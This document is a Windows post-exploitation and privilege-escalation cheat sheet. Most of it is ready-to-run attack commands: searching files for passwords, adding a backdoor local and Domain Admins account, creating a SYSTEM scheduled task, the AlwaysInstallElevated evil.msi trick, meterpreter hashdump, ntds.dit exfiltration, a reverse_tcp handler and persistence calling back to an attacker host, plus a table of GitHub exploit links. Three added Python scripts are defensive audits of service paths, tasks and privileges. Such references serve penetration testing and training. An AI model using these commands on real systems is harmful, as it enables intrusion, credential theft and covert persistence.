Windows Privesc checklist
You have a shell on a Windows Device, now what?
DOMAIN ENUM (if joined)
BloodHound / SharpHound
Who are we? What can we do?
Initial Enumeration
WHOAMI?
whoami
echo %username%
PRIVILEGES?
whoami /priv
SYSTEM INFO
systeminfo
wmic os get Caption,CSDVersion,OSArchitecture,Version
SERVICES
wmic service get name,startname
net start
ADMIN CHECK
net localgroup administrators
net user
NETWORK
netstat -ano
route print
arp -A
ipconfig /all
USERS
net users
net user
net localgroup
FIREWALL
netsh advfirewall firewall show rule name=all
SCHEDULED TASKS
schtasks /query /fo LIST /v > schtasks.txt
INSTALLATION RIGHTS
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
PRIVESC CHECKLIST
UNQUOTED SERVICE PATHS
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /v "C:\Windows" | findstr /v """
WEAK SERVICE PERMISSIONS
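The wmic one-liner above only lists candidates. The Python below is an added example, not part of the original cheat sheet: it applies the same filter (auto-start, outside C:\Windows, unquoted path containing a space) to the CSV form of that query, `wmic service get name,pathname,startmode /format:csv`, and for each hit emits the `sc config ... binPath=` command that quotes the path, which is the fix. The CSV sample is constructed; the split between executable and arguments (first `.exe`) is a heuristic; and a flagged service is only a real problem if a directory on its path is writable, which the accesschk/icacls checks in this section decide.

```python
import csv

# Constructed sample of `wmic service get name,pathname,startmode /format:csv`
# output (wmic emits a leading blank line and a Node column first). A real
# redirected listing is typically UTF-16; read it with encoding="utf-16".
SAMPLE_WMIC_CSV = r"""
Node,Name,PathName,StartMode
HOST01,Spooler,C:\Windows\System32\spoolsv.exe,Auto
HOST01,VendorAgent,C:\Program Files\Example Vendor\Agent\agent.exe -service,Auto
HOST01,VendorGood,"C:\Program Files\Example Vendor\Good\good.exe" -k,Auto
HOST01,VendorTool,C:\Program Files\Example Vendor\Tool\tool.exe,Manual
HOST01,ToolSvc,C:\Tools\toolsvc.exe,Auto
"""


def split_image_path(pathname):
    r"""Split an unquoted image path into (executable, arguments).

    Heuristic used by this example: the executable ends at the first ".exe";
    a path without ".exe" ends at the first space.
    """
    idx = pathname.lower().find(".exe")
    if idx != -1:
        end = idx + len(".exe")
    else:
        end = pathname.find(" ")
        if end == -1:
            end = len(pathname)
    return pathname[:end], pathname[end:].strip()


def is_unquoted_with_spaces(pathname):
    r"""True when the path is not quoted and the executable part has a space,
    i.e. the service control manager would try C:\Program.exe first."""
    pathname = pathname.strip()
    if not pathname or pathname.startswith('"'):
        return False
    exe, _args = split_image_path(pathname)
    return " " in exe


def remediation_command(name, pathname):
    r"""Build the `sc config` command that quotes the executable (the fix).
    The \" escapes are what cmd needs to nest quotes inside binPath= "...".
    """
    exe, args = split_image_path(pathname.strip())
    quoted = '\\"' + exe + '\\"'
    if args:
        quoted += " " + args
    return f'sc config "{name}" binPath= "{quoted}"'


def find_unquoted_service_paths(csv_text):
    r"""Return findings for auto-start services outside C:\Windows whose
    image path is unquoted and contains a space."""
    rows = [line for line in csv_text.splitlines() if line.strip()]
    # QUOTE_NONE keeps a literal leading '"' in PathName; the default dialect
    # would strip it and report a correctly quoted service as vulnerable.
    reader = csv.DictReader(rows, quoting=csv.QUOTE_NONE)
    findings = []
    for row in reader:
        name = (row.get("Name") or "").strip()
        path = (row.get("PathName") or "").strip()
        start_mode = (row.get("StartMode") or "").strip().lower()
        if start_mode != "auto" or path.lower().startswith("c:\\windows"):
            continue
        if is_unquoted_with_spaces(path):
            findings.append({
                "name": name,
                "pathname": path,
                "fix": remediation_command(name, path),
            })
    return findings


if __name__ == "__main__":
    for finding in find_unquoted_service_paths(SAMPLE_WMIC_CSV):
        print(finding["name"], "->", finding["pathname"])
        print("  fix:", finding["fix"])
```

On the sample only VendorAgent is reported: Spooler is under C:\Windows, VendorGood is already quoted, VendorTool is manual-start and ToolSvc has no space in its path.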
accesschk.exe -uwcqv <service>
sc qc <service>
icacls "C:\Path\To\Service.exe"
FILE TRANSFER OPTIONS
certutil.exe
powershell (IEX)
SMB / FTP / TFTP / VBScript
CLEAR TEXT CREDENTIALS
findstr /si password *.txt *.xml *.ini
dir /s *pass* == *cred* == *.config*
WEAK FILE PERMISSIONS
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
NEW ADMIN USER (Local/Domain)
net user bob P@ssw0rd! /add
net localgroup administrators bob /add
net group "Domain Admins" bob /add /domain
SCHEDULED TASK ABUSE
ENUM
schtasks /query /fo LIST /v > tasks.txt
CREATE SYSTEM TASK
schtasks /create /ru SYSTEM /sc MINUTE /mo 5 /tn RUNME /tr "C:\Tools\bobMaint.exe"
RUN TASK
schtasks /run /tn "RUNME"
POST EXPLOIT ENUMERATION
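For the defender's side of the scheduled-task section above (enumerate, create a SYSTEM task, run it), here is an added Python example that is not part of the original cheat sheet: it parses a captured `schtasks /query /fo LIST /v` listing (the tasks.txt from the ENUM step) and flags tasks that run as SYSTEM from a program outside the Windows directory, reporting the author and repeat interval because a non-Microsoft author and a minute-level repeat, as in the /sc MINUTE /mo 5 task above, strengthen the signal. The sample listing is constructed and trimmed to the fields read; the rule for extracting the program from "Task To Run" is a heuristic.

```python
import re

# Constructed sample of `schtasks /query /fo LIST /v` output, trimmed to the
# fields this audit reads (a real listing has more lines per task).
SAMPLE_SCHTASKS = r"""
Folder: \
HostName:                             HOST01
TaskName:                             \RUNME
Status:                               Ready
Author:                               HOST01\bob
Task To Run:                          C:\Tools\bobMaint.exe
Scheduled Task State:                 Enabled
Run As User:                          SYSTEM
Schedule Type:                        One Time Only, Minute
Repeat: Every:                        0 Hour(s), 5 Minute(s)

Folder: \
HostName:                             HOST01
TaskName:                             \BackupNotes
Status:                               Ready
Author:                               HOST01\bob
Task To Run:                          C:\Tools\notes.exe
Scheduled Task State:                 Enabled
Run As User:                          HOST01\bob
Schedule Type:                        Daily
Repeat: Every:                        Disabled

Folder: \Microsoft\Windows\Defrag
HostName:                             HOST01
TaskName:                             \Microsoft\Windows\Defrag\ScheduledDefrag
Status:                               Ready
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\defrag.exe -c -h -o -$
Scheduled Task State:                 Enabled
Run As User:                          SYSTEM
Schedule Type:                        Weekly
Repeat: Every:                        Disabled
"""

# A key ends at the first ':' that is followed by two or more spaces; keys
# such as "Repeat: Every:" contain a colon followed by a single space.
FIELD_RE = re.compile(r"^(.+?):\s{2,}(.*)$")

SYSTEM_ACCOUNTS = {"system", "nt authority\\system", "localsystem"}
WINDOWS_DIR_PREFIXES = ("c:\\windows\\", "%windir%\\", "%systemroot%\\")


def parse_schtasks_list(text):
    """Return one {field: value} dict per task; tasks are separated by blank lines."""
    tasks, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                tasks.append(current)
                current = {}
            continue
        match = FIELD_RE.match(line)
        if match:
            key, value = match.group(1), match.group(2)
        elif ": " in line:  # the "Folder:" line has only a single space
            key, value = line.split(": ", 1)
        else:
            continue
        current[key.strip()] = value.strip()
    if current:
        tasks.append(current)
    return tasks


def command_path(task_to_run):
    """Program part of "Task To Run": the quoted token if quoted, otherwise
    up to the first ".exe" (heuristic), otherwise the first word."""
    cmd = task_to_run.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end != -1 else cmd[1:]
    idx = cmd.lower().find(".exe")
    if idx != -1:
        return cmd[: idx + len(".exe")]
    return cmd.split(" ", 1)[0]


def find_suspicious_system_tasks(text):
    """Flag tasks that run as SYSTEM but launch a program outside the Windows
    directory; author and repeat interval are included for triage."""
    findings = []
    for task in parse_schtasks_list(text):
        if task.get("Run As User", "").lower() not in SYSTEM_ACCOUNTS:
            continue
        program = command_path(task.get("Task To Run", ""))
        if program.lower().startswith(WINDOWS_DIR_PREFIXES):
            continue
        findings.append({
            "task": task.get("TaskName", ""),
            "program": program,
            "author": task.get("Author", ""),
            "repeat": task.get("Repeat: Every", ""),
        })
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_system_tasks(SAMPLE_SCHTASKS):
        print(finding)
```

On the sample only \RUNME is reported: the Defrag task is a SYSTEM task but runs from %windir%, and BackupNotes runs from C:\Tools but as a normal user.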
NETWORK USERS
net user
net user <target>
net localgroup administrators
NT AUTHORITY CHECKS
whoami
accesschk.exe /accepteula
MS09-012.exe "whoami"
HASH DUMP
meterpreter > hashdump
EXFILTRATE ntds.dit
Use secretsdump.py or disk capture tools
INSTALLER ABUSE
AlwaysInstallElevated = 1
msiexec /i evil.msi
SHARE ENUMERATION
net share
net use
net use Z: \\TARGET\SHARE /persistent:yes
WINDOWS PRIV ESC: GITHUB EXPLOITS
| Privilege Name | GitHub PoC |
|---|---|
| SeDebugPrivilege | github.com/bruno-1337/SeDebugPrivilege- |
| SeImpersonatePrivilege | github.com/itm4n/PrintSpoofer |
| SeAssignPrimaryToken | github.com/b4rdia/HackTricks |
| SeTcbPrivilege | github.com/hatRiot/token-priv |
| SeCreateTokenPrivilege | github.com/hatRiot/token-priv |
| SeLoadDriverPrivilege | github.com/k4sth4/SeLoadDriverPrivilege |
| SeTakeOwnershipPrivilege | github.com/hatRiot/token-priv |
| SeRestorePrivilege | github.com/xct/SeRestoreAbuse |
| SeBackupPrivilege | github.com/k4sth4/SeBackupPrivilege |
| SeIncreaseQuotaPrivilege | github.com/b4rdia/HackTricks |
| SeSystemEnvironment | github.com/b4rdia/HackTricks |
| SeMachineAccount | github.com/b4rdia/HackTricks |
| SeTrustedCredManAccess | learn.microsoft.com/…trusted-caller |
| SeRelabelPrivilege | github.com/decoder-it/RelabelAbuse |
| SeManageVolumePrivilege | github.com/CsEnox/SeManageVolumeExploit |
| SeCreateGlobalPrivilege | github.com/b4rdia/HackTricks |
Notes:
- PrintSpoofer is gold for SeImpersonatePrivilege.
- SeManageVolume has practical field PoCs.
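To turn the table above into a check that can be run against a captured `whoami /priv` listing (for example when reviewing what a service account holds), here is an added Python example that is not part of the original cheat sheet. The sample listing is constructed; the privilege set uses the full Windows names, since the table abbreviates four of them (SeAssignPrimaryToken, SeSystemEnvironment, SeMachineAccount and SeTrustedCredManAccess all carry the Privilege suffix in Windows). Disabled privileges are reported too, because a privilege that is present but disabled in the token can be enabled by its holder.

```python
# Full Windows names for the privileges in the table above.
HIGH_RISK_PRIVILEGES = {
    "SeDebugPrivilege",
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeTcbPrivilege",
    "SeCreateTokenPrivilege",
    "SeLoadDriverPrivilege",
    "SeTakeOwnershipPrivilege",
    "SeRestorePrivilege",
    "SeBackupPrivilege",
    "SeIncreaseQuotaPrivilege",
    "SeSystemEnvironmentPrivilege",
    "SeMachineAccountPrivilege",
    "SeTrustedCredManAccessPrivilege",
    "SeRelabelPrivilege",
    "SeManageVolumePrivilege",
    "SeCreateGlobalPrivilege",
}

# Constructed sample of `whoami /priv` output (not captured from a real host).
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeBackupPrivilege             Back up files and directories             Disabled
"""


def parse_whoami_priv(text):
    """Return {privilege_name: state} from `whoami /priv` output.

    Rows follow the '====' ruler line. Privilege names and states never
    contain spaces, so the first and last whitespace-separated tokens are
    taken and the free-text description between them is ignored.
    """
    lines = text.splitlines()
    try:
        start = next(i for i, line in enumerate(lines) if line.startswith("="))
    except StopIteration:
        raise ValueError("no column ruler found; not `whoami /priv` output?") from None
    held = {}
    for line in lines[start + 1:]:
        tokens = line.split()
        if len(tokens) < 2:
            continue
        held[tokens[0]] = tokens[-1]
    return held


def audit_privileges(text):
    """Return sorted (name, state) pairs for high-risk privileges the token
    holds, enabled or disabled."""
    held = parse_whoami_priv(text)
    return sorted(
        (name, state) for name, state in held.items()
        if name in HIGH_RISK_PRIVILEGES
    )


if __name__ == "__main__":
    for name, state in audit_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{name:<32} {state}")
```

On the sample the audit reports SeBackupPrivilege (disabled), SeCreateGlobalPrivilege and SeImpersonatePrivilege; SeChangeNotifyPrivilege and SeIncreaseWorkingSetPrivilege are held by every token and are not in the table.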
MAINTAINING ACCESS
METERPRETER REVERSE SHELL SETUP
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker_ip>
set LPORT <port>
exploit
PERSISTENCE
meterpreter > run persistence -U -i 5 -p 443 -r <LHOST>
PORT FORWARDING
meterpreter > portfwd add -l 3306 -p 3306 -r <target_ip>
SYSTEM MIGRATION
meterpreter > run post/windows/manage/migrate
meterpreter > migrate <PID>
EXECUTE PAYLOADS
powershell.exe "C:\Tools\privesc.ps1"
RESOURCES
Windows Exploit Suggester (kind of old)
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
Windows privesc checker (contemporary)
https://github.com/itm4n/PrivescCheck
Cross Compile Payloads (Linux > Windows)
apt-get install mingw-w64
x86:
i686-w64-mingw32-gcc hello.c -o hello.exe
x64:
x86_64-w64-mingw32-gcc hello.c -o hello64.exe
Additional Reading
https://www.fuzzysecurity.com/tutorials/16.html
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation